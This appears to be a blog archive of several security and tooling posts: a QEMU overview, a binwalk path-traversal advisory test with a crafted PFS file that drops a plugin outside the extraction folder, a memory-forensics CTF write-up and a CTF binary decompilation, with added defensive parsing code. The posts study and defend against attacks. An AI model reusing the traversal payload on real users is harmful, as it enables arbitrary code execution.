What is QEMU?

QEMU is virtualization software that lets users run virtual machines on a variety of architectures. It is free and runs on many operating systems. QEMU also supports hardware acceleration; combined with KVM (Kernel Virtual Machine) in particular, it can improve virtualization performance.

QEMU features

QEMU provides the following features:

  • Creating and running virtual machines
  • Virtual machines on a variety of architectures
  • Hardware acceleration support
  • Runs on a variety of operating systems
  • GUI and CLI interfaces

Using QEMU

QEMU is used to create and run virtual machines. To create and run a virtual machine with QEMU, follow these steps:

  1. Install QEMU.
  2. Create a virtual machine with QEMU.
  3. Install an operating system in the created virtual machine.
  4. Run the created virtual machine.

QEMU can be used through the CLI (Command-Line Interface); a virtual machine is created and run with a command of the following form:

qemu-system-{arch} [options] [disk_image]

Here {arch} is the architecture of the virtual machine to create. For example, to create an x86 virtual machine, use the qemu-system-x86_64 command.
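As an added example (not from the original post), the following POSIX shell script carries the four steps above into one runnable form for an x86_64 guest: it creates a qcow2 disk with qemu-img if none exists, picks KVM when /dev/kvm is usable by the current user and falls back to TCG software emulation otherwise, and boots an installer ISO. The DISK and ISO paths are placeholders (use paths without spaces), and the VM is only launched when the script is invoked with the argument `run`.

```shell
#!/bin/sh
# Added example: create a disk image and boot an installer ISO with QEMU,
# using KVM when the host exposes it and TCG otherwise.
# DISK and ISO are placeholder paths; override them from the environment.

DISK="${DISK:-vm.qcow2}"
ISO="${ISO:-install.iso}"

# Print "kvm" if /dev/kvm is readable and writable by this user, else "tcg".
choose_accel() {
    if [ -r /dev/kvm ] && [ -w /dev/kvm ]; then
        echo kvm
    else
        echo tcg
    fi
}

# Print the qemu-system-x86_64 argument list for the given accelerator.
# "-cpu host" is only valid under KVM, so TCG gets the generic qemu64 model.
qemu_args() {
    accel="$1"
    cpu=host
    [ "$accel" = kvm ] || cpu=qemu64
    printf '%s ' -accel "$accel" -cpu "$cpu" -m 2048 -smp 2 \
        -drive "file=$DISK,format=qcow2,if=virtio" \
        -cdrom "$ISO" -boot d -nic user,model=virtio-net-pci
}

# Steps 2-4 of the procedure: create the disk once, then boot from the ISO.
if [ "${1:-}" = run ]; then
    [ -f "$DISK" ] || qemu-img create -f qcow2 "$DISK" 20G
    # shellcheck disable=SC2046
    exec qemu-system-x86_64 $(qemu_args "$(choose_accel)")
fi
```

Running `DISK=/path/vm.qcow2 ISO=/path/install.iso sh qemu-run.sh run` performs the create-and-boot step; `-boot d` boots from the CD-ROM for the installation, after which the `-cdrom`/`-boot d` options can be dropped to boot from the disk.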

Pros and cons of QEMU

Pros

  • Virtual machines on a variety of architectures
  • Hardware acceleration support
  • Runs on a variety of operating systems

Cons

  • Performance is relatively slow
  • The GUI interface is somewhat inconvenient

Conclusion

QEMU is free virtualization software that can run virtual machines on a variety of architectures. It supports hardware acceleration to improve virtualization and runs on a variety of operating systems. Its drawbacks are that performance is relatively slow and the GUI interface is somewhat inconvenient.

Example of using chatGPT

Query about 2022 security issues

Results of trying it out

- It is very good for trend overviews and short summary reports.

- I have not yet tried it on in-depth code, but from several indications I expect the quality would not be bad.

- It made me want to try whether it can also do vulnerability checks.

- Next I plan to test it on video editing.

- It is going to be hard to make a living from now on... ㅜㅜ

Description

A path traversal vulnerability was identified in ReFirm Labs binwalk versions 2.1.2b through 2.3.2.

Through this vulnerability a remote attacker can execute arbitrary code on an affected binwalk installation.

User interaction is required to exploit this vulnerability, in that the target must open a malicious file with binwalk using the extraction mode (the -e option).

Test environment

  • macOS Ventura 3.1
  • Binwalk v2.3.3 installed via Homebrew

Test procedure

  1. binwalk -e -M poc.zip
babyhack@MacBookPro> binwalk -e -M poc.zip

Scan Time:     2023-02-01 20:30:54
Target File:   /Users/babyhack/Downloads/poc.zip
MD5 Checksum:  4fdad30c7c1b4915938b5ad2786f5bf8
Signatures:    411

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             Zip archive data, at least v2.0 to extract, compressed size: 170, uncompressed size: 349, name: malicious.pfs
324           0x144           End of Zip archive, footer length: 22

Scan Time:     2023-02-01 20:30:54
Target File:   /Users/babyhack/Downloads/_poc.zip.extracted/malicious.pfs
MD5 Checksum:  9a12bccad3db3ed8b818a31846d5976f
Signatures:    411

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             PFS filesystem, version 0.9, 1 files

Contents of malicious.pfs

babyhack@MacBookPro> xxd malicious.pfs
00000000: 5046 532f 302e 3900 0000 0000 0000 0100  PFS/0.9.........
00000010: 2e2e 2f2e 2e2f 2e2e 2f2e 636f 6e66 6967  ../../../.config
00000020: 2f62 696e 7761 6c6b 2f70 6c75 6769 6e73  /binwalk/plugins
00000030: 2f6d 616c 7761 6c6b 2e70 7900 0000 0000  /malwalk.py.....
00000040: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000050: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000060: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000070: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000080: 0000 0000 0000 0000 0000 0000 0000 0000  ................
00000090: 3412 0000 a000 0000 c100 0000 696d 706f  4...........impo
000000a0: 7274 2062 696e 7761 6c6b 2e63 6f72 652e  rt binwalk.core.
000000b0: 706c 7567 696e 0a0a 636c 6173 7320 4d61  plugin..class Ma
000000c0: 6c69 6369 6f75 7345 7874 7261 6374 6f72  liciousExtractor
000000d0: 2862 696e 7761 6c6b 2e63 6f72 652e 706c  (binwalk.core.pl
000000e0: 7567 696e 2e50 6c75 6769 6e29 3a0a 2020  ugin.Plugin):.
000000f0: 2020 2222 220a 2020 2020 4d61 6c69 6369    """.    Malici
00000100: 6f75 7320 6269 6e77 616c 6b20 706c 7567  ous binwalk plug
00000110: 696e 0a20 2020 2022 2222 0a0a 2020 2020  in.    """..
00000120: 6465 6620 696e 6974 2873 656c 6629 3a0a  def init(self):.
00000130: 2020 2020 2020 2020 7072 696e 7428 2268          print("h
00000140: 656c 6c6f 2066 726f 6d20 6d61 6c69 6369  ello from malici
00000150: 6f75 7320 706c 7567 696e 2229 0a         ous plugin").
import binwalk.core.plugin

class MaliciousExtractor(binwalk.core.plugin.Plugin):
    """
    Malicious binwalk plugin.
    """
    def init(self):
        print("hello from malicious plugin")

Result

  • It did not run properly because binwalk.core.plugin could not be referenced.
  • It may also have failed to run because the versions do not match.
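As an added example (not part of the original post and not binwalk's own code), the following Python parses a PFS/0.9 file table using the layout visible in the hex dump above and applies the containment check an extractor needs before it writes any entry to disk. The layout (16-byte header with the file count at offset 14, then 140-byte entries of a 128-byte NUL-padded name, a 32-bit attribute, a 32-bit offset and a 32-bit size) is inferred from the dump and is an assumption of this example; the sample image is constructed here from the traversal name seen in the dump plus one benign entry.

```python
import os
import struct

# Layout inferred from the hex dump above (an assumption for this example, not
# binwalk's own parser): 16-byte header "PFS/0.9\0" + 6 bytes padding + little-endian
# uint16 file count; then one 140-byte entry per file (128-byte NUL-padded name,
# uint32 attributes, uint32 data offset, uint32 size); file data follows the table.
HEADER_FMT = "<8s6sH"
ENTRY_FMT = "<128sIII"
HEADER_SIZE = struct.calcsize(HEADER_FMT)   # 16
ENTRY_SIZE = struct.calcsize(ENTRY_FMT)     # 140
MAGIC = b"PFS/0.9\0"


def build_pfs(files):
    """Construct a PFS/0.9 image from (name, data) pairs; used only to make sample input."""
    table, blobs = b"", b""
    data_start = HEADER_SIZE + ENTRY_SIZE * len(files)
    for name, data in files:
        raw = name.encode()
        if len(raw) > 128:
            raise ValueError("name too long for a PFS entry")
        table += struct.pack(ENTRY_FMT, raw, 0x1234, data_start + len(blobs), len(data))
        blobs += data
    return struct.pack(HEADER_FMT, MAGIC, b"\0" * 6, len(files)) + table + blobs


def parse_pfs(blob):
    """Return (name, offset, size) for each entry in the table."""
    magic, _, count = struct.unpack_from(HEADER_FMT, blob, 0)
    if magic != MAGIC:
        raise ValueError("not a PFS/0.9 image")
    entries = []
    for i in range(count):
        raw, _attr, off, size = struct.unpack_from(ENTRY_FMT, blob, HEADER_SIZE + i * ENTRY_SIZE)
        name = raw.split(b"\0", 1)[0].decode("utf-8", "replace")
        entries.append((name, off, size))
    return entries


def is_contained(base_dir, name):
    """True only if writing `name` under base_dir cannot land outside it.
    Absolute names and backslashes are rejected outright; realpath resolution
    defeats '..' components. This is the check the vulnerable extractor skipped."""
    if os.path.isabs(name) or "\\" in name:
        return False
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, name))
    return os.path.commonpath([base, target]) == base


def triage(blob, base_dir="/tmp/_poc.zip.extracted"):
    """Per-entry verdict, so traversal names are rejected before any file is written."""
    return [(name, "ok" if is_contained(base_dir, name) else "TRAVERSAL")
            for name, _, _ in parse_pfs(blob)]


# Constructed sample: the traversal name seen in the hex dump plus a benign entry.
SAMPLE = build_pfs([
    ("../../../.config/binwalk/plugins/malwalk.py", b"# plugin body omitted\n"),
    ("etc/version", b"0.9\n"),
])

if __name__ == "__main__":
    for name, verdict in triage(SAMPLE):
        print(f"{verdict:9} {name}")
```

The point of `is_contained` is that the decision is made on the resolved path, not on the presence of a `..` substring: a name such as `a/../../b` contains no leading `..` yet still escapes, and resolving both sides with `realpath` before comparing catches it.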

ref.

  • https://onekey.com/blog/security-advisory-remote-command-execution-in-binwalk

Spectrum Analyser

Spectrum Analyser is a tool that is designed to help reverse engineer ZX Spectrum games & programs. It is a combination of an emulator, debugger & interactive disassembler. Programs are loaded and run in the emulator and their state can be inspected using the tools provided.

These tools include:

• Disassembler

• Debugger

• Graphics viewer

• Frame trace

• Memory diff

• IO analyser

 

Other features include:

• Interactive annotation: labels, functions & comments

• Watch window

• Format memory as Byte, Word, Char Map, Bitmap etc.

• Breakpoints: break on code execution, memory access, NMI, IRQ, IN & OUT

• Fully annotated Sinclair ROM

• Self modifying code support

• Automatic code detection

• Automatic data detection

• Poke support

• Skoolkit import and export

• Character graphic memory search tool

• Z80 instruction informational tooltips

 

How does it work?

The traditional way to reverse engineer software is to manually determine which areas of the computer memory are code or data. A disassembler can then be used to produce an assembly listing of the code memory bytes. One way to achieve this is to observe the code running through a debugger.

This can be slow work – although some excellent tools exist to help with this process, such as IDA Pro or Ghidra. This process can be partially automated by using an execution trace file. This can help confirm which areas of memory are code if we know they have been executed.

 

Spectrum Analyser aims to automate as much of the manual process as possible. It has an emulator built in, which means it can automatically detect which memory locations are code when those locations are executed. The more you play the game, the more code it will uncover. However, Spectrum Analyser is very much interactive. You are free to manually mark up areas of memory as code if you prefer – without needing to execute the code in question. You do not need to tell Spectrum Analyser where the code ends – only where it begins. It will use static code analysis to work out where the code terminates.

 

Starting Off

When you open a game for the first time Spectrum Analyser will start from a blank slate. In this state, all memory locations will be formatted as byte data. This is the default state of memory that hasn’t been executed.

This is the same memory after the program has been executed. Spectrum Analyser has set the memory to code and added labels for functions in addition to branch destination labels.

These labels can then be renamed when you figure out what the code is actually doing. You can then add comments to the disassembly.

 

Screenshots

Here are some action shots of Spectrum Analyser. For best results you may need to download the images and view them full screen or open them in a separate tab.

 

Acknowledgements

This program was built using the superb Chips emulator library by Andre Weissflog, the emulation in the analyser is done using this library: https://github.com/floooh/chips

 


For the UI, DearImGui is used (https://github.com/ocornut/imgui) which is without doubt one of the greatest pieces of open source software. Without it not only would the UI take much longer but working on it would also be exceedingly dull.

 

Spectrum Analyser contains a full disassembly of the Sinclair ROM. This was possible because of the skoolkit disassembly done by Richard Dymond. https://skoolkit.ca/disassemblies/rom/

 


Tutorial

Need help getting started using Spectrum Analyser, or just want to see how it works? Here is a tutorial. This doesn’t cover everything but it will get you started.

https://www.youtube.com/embed/-HFXnF4cHb0

 


Documentation: There is some (incomplete) documentation here.

Contact: Feedback and bug reports are very welcome. Please send them to spectrumanalysertool@gmail.com

Download: Click here to download the latest version (Windows 10 and above).

 

ref.

https://colourclash.co.uk/spectrum-analyser/?fbclid=IwAR3i9CsPO9fLrd47L8Iob1DoQ_HDTdPOX4JKRGub7gcAvUgQY1zYNIrAWjU 

 

컴퓨터_보안_창과방패.7z.001

컴퓨터_보안_창과방패.7z.002

컴퓨터_보안_창과방패.7z.003



It has been a while since I last posted.

Recently I have been receiving e-mails now and then asking me to share my lecture materials.

So I will share them on my homepage.


I am currently unable to reach the publisher, Ehan Media (이한미디어),

and I feel I should repay those who bought the book I wrote in at least this way, so I am sharing the materials.


If anything is lacking, feel free to contact me at any time.


crattack@gmail.com


Because these are lecture materials, I am afraid I cannot share them with individuals.

If you teach a course, please e-mail me from your school account with your name and the subject you teach,

and I will share the password.


Thank you again for buying the book.

I will try to come back with an even better book.

( _ _ )


Thanks to Kenji Aiko, who requested the challenge; here is the solution to the challenge I set.

(Forensic 100)


/////////////////////////////////////////////////////////////////////////////////////////////////////////

 

 

Forensic 100 - writeup

Date. 2016. 11. 07.

Written by crattack

 

 

 

Question.

While using a computer, it was noticed that the machine was slowing down. Tracing the cause, a particular file was found to be continuously connecting to the Internet. Accessing that site showed a particular phrase.

Access the site and obtain that phrase, the flag.



Write up.

 

1. Check the image information

( http://downloads.volatilityfoundation.org/releases/2.4/volatility_2.4.win.standalone.zip)

C:\Volatility>vol.py -f "C:\Forensic_100\forensic_100.raw" imageinfo

 

Volatility Foundation Volatility Framework 2.4

*** Failed to import volatility.plugins.linux.netscan (ImportError: No module named yara)

Determining profile based on KDBG search...

 

          Suggested Profile(s) : WinXPSP2x86, WinXPSP3x86 (Instantiated with WinXPSP2x86)

                     AS Layer1 : IA32PagedMemoryPae (Kernel AS)

                     AS Layer2 : FileAddressSpace (C:\Forensic_100\forensic_100.raw)

                      PAE type : PAE

                           DTB : 0x34c000L

                          KDBG : 0x80545ce0L

          Number of Processors : 1

     Image Type (Service Pack) : 3

                KPCR for CPU 0 : 0xffdff000L

             KUSER_SHARED_DATA : 0xffdf0000L

           Image date and time : 2016-10-31 05:45:14 UTC+0000

     Image local date and time : 2016-10-31 14:45:14 +0900

 

2. Use the DLL list to identify abnormal processes

 

C:\Volatility>vol.py -f "C:\Forensic_100\forensic_100.raw" dlllist > C:\Forensic_100\dlllist.txt

 

*** Failed to import volatility.plugins.linux.netscan (ImportError: No module named yara)

************************************************************************

System pid:      4

Unable to read PEB for task.

************************************************************************

smss.exe pid:    540

Unable to read PEB for task.

************************************************************************

csrss.exe pid:    604

Command line : C:\WINDOWS\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,3072,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ProfileControl=Off MaxRequestThreads=16

Service Pack 3

 

Base             Size  LoadCount Path

---------- ---------- ---------- ----

0x4a680000     0x5000     0xffff \??\C:\WINDOWS\system32\csrss.exe

0x7c900000    0xb2000     0xffff C:\WINDOWS\system32\ntdll.dll

0x75b40000     0xb000     0xffff C:\WINDOWS\system32\CSRSRV.dll

0x75b50000    0x10000        0x3 C:\WINDOWS\system32\basesrv.dll

0x75b60000    0x4b000        0x2 C:\WINDOWS\system32\winsrv.dll

0x77f10000    0x49000        0xa C:\WINDOWS\system32\GDI32.dll

0x7c800000    0xf6000       0x1f C:\WINDOWS\system32\KERNEL32.dll

0x7e410000    0x91000        0xa C:\WINDOWS\system32\USER32.dll

0x629c0000     0x9000        0x1 C:\WINDOWS\system32\LPK.DLL

0x74d90000    0x6b000        0x1 C:\WINDOWS\system32\USP10.dll

0x77dd0000    0x9b000        0xd C:\WINDOWS\system32\ADVAPI32.dll

0x77e70000    0x93000        0x7 C:\WINDOWS\system32\RPCRT4.dll

0x77fe0000    0x11000        0x5 C:\WINDOWS\system32\Secur32.dll

0x7e720000    0xb0000        0x1 C:\WINDOWS\system32\sxs.dll

************************************************************************

………………………………………………

 

DumpIt.exe pid:   3784

Command line : "C:\Documents and Settings\Administrator\My Documents\Downloads\DumpIt.exe"

Service Pack 3

 

Base             Size  LoadCount Path

---------- ---------- ---------- ----

0x00400000    0x35000     0xffff C:\Documents and Settings\Administrator\My Documents\Downloads\DumpIt.exe

0x7c900000    0xb2000     0xffff C:\WINDOWS\system32\ntdll.dll

0x7c800000    0xf6000     0xffff C:\WINDOWS\system32\kernel32.dll

0x77dd0000    0x9b000     0xffff C:\WINDOWS\system32\ADVAPI32.dll

0x77e70000    0x93000     0xffff C:\WINDOWS\system32\RPCRT4.dll

0x77fe0000    0x11000     0xffff C:\WINDOWS\system32\Secur32.dll

0x77f60000    0x76000     0xffff C:\WINDOWS\system32\SHLWAPI.dll

0x77f10000    0x49000     0xffff C:\WINDOWS\system32\GDI32.dll

0x7e410000    0x91000     0xffff C:\WINDOWS\system32\USER32.dll

0x77c10000    0x58000     0xffff C:\WINDOWS\system32\msvcrt.dll

0x76390000    0x1d000        0x1 C:\WINDOWS\system32\IMM32.DLL

0x629c0000     0x9000        0x1 C:\WINDOWS\system32\LPK.DLL

0x74d90000    0x6b000        0x1 C:\WINDOWS\system32\USP10.dll

************************************************************************

svchost.exe pid:    1776

Command line : "C:\WINDOWS\svchost.exe"

Service Pack 3

 

Base             Size  LoadCount Path

---------- ---------- ---------- ----

0x00400000     0x9000     0xffff C:\WINDOWS\svchost.exe

0x7c900000    0xb2000     0xffff C:\WINDOWS\system32\ntdll.dll

0x7c800000    0xf6000     0xffff C:\WINDOWS\system32\kernel32.dll

0x10000000     0xa000     0xffff C:\WINDOWS\JDMBackgroundProcess.dll

0x77dd0000    0x9b000     0xffff C:\WINDOWS\system32\ADVAPI32.dll

0x77e70000    0x93000     0xffff C:\WINDOWS\system32\RPCRT4.dll

0x77fe0000    0x11000     0xffff C:\WINDOWS\system32\Secur32.dll

0x00350000    0x6d000     0xffff C:\WINDOWS\system32\MSVCP140.dll

0x003c0000    0x15000     0xffff C:\WINDOWS\system32\VCRUNTIME140.dll

0x003e0000     0x4000     0xffff C:\WINDOWS\system32\api-ms-win-crt-runtime-l1-1-0.dll

0x00410000    0xd8000     0xffff C:\WINDOWS\system32\ucrtbase.dll

0x003f0000     0x3000     0xffff C:\WINDOWS\system32\api-ms-win-core-string-l1-1-0.dll

0x004f0000     0x3000     0xffff C:\WINDOWS\system32\api-ms-win-core-errorhandling-l1-1-0.dll

…………………………..

************************************************************************

………………………….

IEXPLORE.EXE pid:   2304

Command line : "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2496 CREDAT:79880

Service Pack 3

……………………………………………………
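The dlllist review above turns on two observations: a process named svchost.exe whose image is C:\WINDOWS\svchost.exe rather than C:\WINDOWS\system32\svchost.exe, and a module (JDMBackgroundProcess.dll) loaded from outside the usual system directories. As an added example (not part of the original write-up), the following Python parses dlllist output in the format shown above and makes both checks automatically, so the same triage can be run over a dump with hundreds of processes. The trusted-directory list and the expected locations of the core binaries are assumptions of this example (Windows XP layout, as in this image), and the sample text is an abridged, constructed copy of the output above.

```python
import ntpath
import re

# Directory where the genuine copy of each core Windows XP binary lives (lower-case);
# a process with one of these names whose image is elsewhere is worth a look.
# Assumption of this example: XP layout as seen in the dump above.
EXPECTED_DIR = {name: "c:\\windows\\system32" for name in
                ("svchost.exe", "csrss.exe", "smss.exe", "lsass.exe",
                 "services.exe", "winlogon.exe")}
EXPECTED_DIR["explorer.exe"] = "c:\\windows"
# Directories from which loaded modules are considered unremarkable (assumption).
TRUSTED_DIRS = ("c:\\windows\\system32", "c:\\windows\\winsxs", "c:\\program files")

HEADER_RE = re.compile(r"^(?P<name>\S+) pid:\s+(?P<pid>\d+)\s*$")
ROW_RE = re.compile(r"^0x[0-9a-f]+\s+0x[0-9a-f]+\s+0x[0-9a-f]+\s+(?P<path>\S.*?)\s*$", re.I)


def normalize(path):
    """Lower-case and strip the NT \\??\\ prefix so paths compare uniformly."""
    p = path.strip('"').lower()
    return p[4:] if p.startswith("\\??\\") else p


def under(path, directory):
    """True if path's directory is `directory` or a subdirectory of it."""
    d = ntpath.dirname(path)
    return d == directory or d.startswith(directory + "\\")


def parse_dlllist(text):
    """Split Volatility 2 dlllist output into per-process records.
    The first module row of each block is the process image itself."""
    procs, cur = [], None
    for line in text.splitlines():
        m = HEADER_RE.match(line)
        if m:
            cur = {"name": m["name"], "pid": int(m["pid"]), "cmdline": "", "modules": []}
            procs.append(cur)
        elif cur is not None and line.startswith("Command line :"):
            cur["cmdline"] = line.split(":", 1)[1].strip()
        elif cur is not None:
            r = ROW_RE.match(line)
            if r:
                cur["modules"].append(normalize(r["path"]))
    return procs


def triage(procs):
    """(pid, reason) findings: system-named processes whose image is not in the
    expected directory, and modules loaded from outside the trusted directories."""
    findings = []
    for p in procs:
        name = p["name"].lower()
        image = p["modules"][0] if p["modules"] else ""
        expected = EXPECTED_DIR.get(name)
        if expected and ntpath.dirname(image) != expected:
            findings.append((p["pid"], f"{name} image at {image}, expected {expected}"))
        for mod in p["modules"][1:]:
            if not any(under(mod, d) for d in TRUSTED_DIRS):
                findings.append((p["pid"], f"module outside trusted dirs: {mod}"))
    return findings


# Constructed sample: an abridged copy of the dlllist output shown above.
SAMPLE = r"""************************************************************************
csrss.exe pid:    604
Command line : C:\WINDOWS\system32\csrss.exe ObjectDirectory=\Windows
Service Pack 3

Base             Size  LoadCount Path
---------- ---------- ---------- ----
0x4a680000     0x5000     0xffff \??\C:\WINDOWS\system32\csrss.exe
0x7c900000    0xb2000     0xffff C:\WINDOWS\system32\ntdll.dll
************************************************************************
svchost.exe pid:    1776
Command line : "C:\WINDOWS\svchost.exe"
Service Pack 3

Base             Size  LoadCount Path
---------- ---------- ---------- ----
0x00400000     0x9000     0xffff C:\WINDOWS\svchost.exe
0x7c900000    0xb2000     0xffff C:\WINDOWS\system32\ntdll.dll
0x10000000     0xa000     0xffff C:\WINDOWS\JDMBackgroundProcess.dll
0x00350000    0x6d000     0xffff C:\WINDOWS\system32\MSVCP140.dll
"""

if __name__ == "__main__":
    for pid, reason in triage(parse_dlllist(SAMPLE)):
        print(pid, reason)
```

On the real dlllist.txt from this image the same two findings, both against pid 1776, are what single out the fake svchost.exe for the procdump step that follows.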

 

 

3. Dump and analyze the suspicious process

 

C:\Volatility>vol.py -f "c:\forensic_100\forensic_100.raw" procdump --pid=1776 -D c:\forensic_100\

 

Volatility Foundation Volatility Framework 2.4

*** Failed to import volatility.plugins.linux.netscan (ImportError: No module named yara)

Process(V) ImageBase  Name                 Result

---------- ---------- -------------------- ------

0x81f65da0 0x00400000 svchost.exe          OK: executable.1776.exe

 

 



000000001B68   000000403368      0   C:\Program Files\Internet Explorer\iexplore.exe http://crattack.tistory.com/entry/Data-Science-import-pandas-as-pd


 

4. Check the connection information

Check the domain

 




C:\Volatility>vol.py -f "C:\Forensic_100\forensic_100.raw" connections > C:\Forensic_100\connections.txt


 

*** Failed to import volatility.plugins.linux.netscan (ImportError: No module named yara)

Offset(V)  Local Address             Remote Address            Pid

---------- ------------------------- ------------------------- ---

0x8213bbe8 192.168.88.131:1034       153.127.200.178:80           1080

 

It does not match the connection information, so domain-related tampering is suspected.

 

5. Find the address of the hosts file in order to dump it

 

C:\Volatility>vol.py -f "C:\Forensic_100\forensic_100.raw" filescan > c:\forensic_100\filescan.txt


 

*** Failed to import volatility.plugins.linux.netscan (ImportError: No module named yara)

Offset(P)            #Ptr   #Hnd Access Name

------------------ ------ ------ ------ ----

0x0000000001734038      3      0 RWD--- \Device\HarddiskVolume1\$Directory

0x000000000174a270      3      0 RWD--- \Device\HarddiskVolume1\$Directory

0x0000000001756cf8      1      0 R--r-d \Device\HarddiskVolume1??????


?

0x00000000017634f0      1      0 -W---- \Device\HarddiskVolume1??????????????

0x0000000001763c60      1      0 R--r-d \Device\HarddiskVolume1?

0x0000000001794b18      3      0 RWD--- \Device\HarddiskVolume1\$Directory

.........................................

0x00000000020f0268      1      0 R--rw- \Device\HarddiskVolume1\WINDOWS\svchost.exe

0x00000000020f0a90      2      1 ------ \Device\NamedPipe\PCHHangRepExecPipe

0x00000000020f3888      1      0 R--rw- \Device\HarddiskVolume1\Documents and Settings\All Users\Application Data\VMware\VMware Tools\Unity Filters\adobeflashcs3.txt

0x00000000020f4f90      1      1 ------ \Device\NamedPipe\net\NtControlPipe8

0x00000000020f5028      2      1 R--rw- \Device\HarddiskVolume1\WINDOWS\system32\mui\041e

0x00000000020f50d0      2      1 R--rw- \Device\HarddiskVolume1\WINDOWS\system32\mui\0425

0x00000000020f5e38      3      0 RWD--- \Device\HarddiskVolume1\$Directory

0x00000000020f5f90      3      0 RWD--- \Device\HarddiskVolume1\$Directory

0x00000000020f6108      2      1 R--rw- \Device\HarddiskVolume1\WINDOWS\system32\mui\040C

0x00000000020f8658      3      0 RWD--- \Device\HarddiskVolume1\$ConvertToNonresident

.............................

0x000000000217b748      1      0 R--rw- \Device\HarddiskVolume1\WINDOWS\system32\drivers\etc\hosts

………………………

 

Dump the hosts file using its memory address

 

C:\Volatility>vol.py -f "c:\forensic_100\forensic_100.raw" dumpfiles -Q 0x217b748 --dump-dir=c:\forensic_100\

 

# Copyright (c) 1993-1999 Microsoft Corp.

#

# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.

#

# This file contains the mappings of IP addresses to host names. Each

# entry should be kept on an individual line. The IP address should

# be placed in the first column followed by the corresponding host name.

# The IP address and the host name should be separated by at least one

# space.

#

# Additionally, comments (such as these) may be inserted on individual

# lines or following the machine name denoted by a '#' symbol.

#

# For example:

#

#      102.54.94.97     rhino.acme.com          # source server

#       38.25.63.10     x.acme.com              # x client host

 

127.0.0.1       localhost

153.127.200.178    crattack.tistory.com

 

http://153.127.200.178/entry/Data-Science-import-pandas-as-pd
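Steps 4 and 5 come together in one check: a hosts entry pins a public name (crattack.tistory.com) to an address that does not belong to it, and that address is exactly the remote endpoint in the connections output. As an added example (not part of the original write-up), the following Python parses a dumped hosts file and Volatility 2 connections output in the formats shown above, lists hosts entries that map a name to a routable (non-loopback) address, and reports the active connections whose remote address matches one of them. The sample inputs are constructed from the output above.

```python
import ipaddress
import re

# One connections row: offset, local ip:port, remote ip:port, pid (format shown above).
CONN_RE = re.compile(r"^0x[0-9a-f]+\s+(\S+):(\d+)\s+(\S+):(\d+)\s+(\d+)\s*$", re.I)


def parse_hosts(text):
    """(hostname, ip) pairs from a hosts file; '#' comments and blank lines are skipped."""
    pairs = []
    for line in text.splitlines():
        body = line.split("#", 1)[0].split()
        if len(body) < 2:
            continue
        ip, names = body[0], body[1:]
        pairs.extend((n.lower(), ip) for n in names)
    return pairs


def pinned_names(pairs):
    """Entries that map a name to a routable address: the shape of a hosts-file hijack,
    since a legitimate hosts file normally only carries loopback entries."""
    out = []
    for name, ip in pairs:
        try:
            addr = ipaddress.ip_address(ip)
        except ValueError:
            continue                     # malformed line, not an address
        if addr.is_loopback or addr.is_unspecified:
            continue
        out.append((name, ip))
    return out


def parse_connections(text):
    """Rows of Volatility 2 'connections' output as dicts."""
    conns = []
    for line in text.splitlines():
        m = CONN_RE.match(line)
        if m:
            conns.append({"local": m[1], "lport": int(m[2]), "remote": m[3],
                          "rport": int(m[4]), "pid": int(m[5])})
    return conns


def correlate(hosts_text, connections_text):
    """(pid, name, remote) for active connections whose remote address is pinned in hosts."""
    pinned = pinned_names(parse_hosts(hosts_text))
    hits = []
    for c in parse_connections(connections_text):
        for name, ip in pinned:
            if ip == c["remote"]:
                hits.append((c["pid"], name, f"{ip}:{c['rport']}"))
    return hits


# Constructed samples, abridged from the dumped hosts file and connections output above.
HOSTS = """# Copyright (c) 1993-1999 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#      102.54.94.97     rhino.acme.com          # source server
#       38.25.63.10     x.acme.com              # x client host

127.0.0.1       localhost
153.127.200.178    crattack.tistory.com
"""

CONNECTIONS = """Offset(V)  Local Address             Remote Address            Pid
---------- ------------------------- ------------------------- ---
0x8213bbe8 192.168.88.131:1034       153.127.200.178:80           1080
"""

if __name__ == "__main__":
    for pid, name, remote in correlate(HOSTS, CONNECTIONS):
        print(f"pid {pid}: {name} is pinned in hosts to {remote}")
```

The example-comment lines in the Microsoft template (`# 102.54.94.97 rhino.acme.com`) are why comments must be stripped before parsing; otherwise they would show up as pinned names.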



------------------------------------------------------

This concludes the write-up.

It was fun to make a challenge again after a long time. ( _ _ )

https://github.com/ctfs/write-ups-2016/tree/master/secuinside-ctf-quals-2016/cgc/cykor_00002-150

write up : https://ctf.rip/secuinside2016-cykor00002/


vagrant@crs:~$ ./cykor_00002
----------------------------------------
-          Simple Echo System          -
----------------------------------------
What is your name?
name: ADMIN
+ Gimme a key : aaaaaaaaaaaaaaa
Get out of here :(


First, run the binary, then proceed with the IDA analysis starting from the strings shown in that run.


int main_sub_8048F50()
{
  char v1; // [esp+70h] [ebp-448h]@1
  char v2; // [esp+B0h] [ebp-408h]@3
  char v3; // [esp+B1h] [ebp-407h]@4
  int v4; // [esp+4B0h] [ebp-8h]@1

  v4 = 0;
  sub_8049FC0("----------------------------------------\n");
  sub_8049FC0("-          Simple Echo System          -\n");
  sub_8049FC0("----------------------------------------\n");
  sub_8049FC0("What is your name?\n");
  sub_8048E90(&v1);
  if ( sub_8048E10((int)&v1, (int)"ADMIN", 5u) )
  {
    sub_8049FC0("Hi %s\n");
    sub_8049FC0(": ");
    *(&v2 + sub_80480A0(&v2, 1000, 10)) = 0;
    sub_8049FC0("%s\n");
  }
  else
  {
    sub_8049FC0("+ Gimme a key : ");
    sub_80480A0(&01_byte_805F454, 27, 10);
    if ( compare_key_sub_8048150() )
    {
      sub_8049FC0("Welcome Admin :)\n");
      sub_8049FC0(": ");
      sub_80480A0(&v2, 1000, 10);
      if ( v2 == 'C' && v3 == 'K' )
        MEMORY[0] = 10;
      sub_8049FC0("%s\n");
    }
    else
    {
      sub_8049FC0("Get out of here :(\n");
    }
  }
  return 0;
}
 


Looking at compare_key_sub_8048150(), you can only pass by matching specific values.


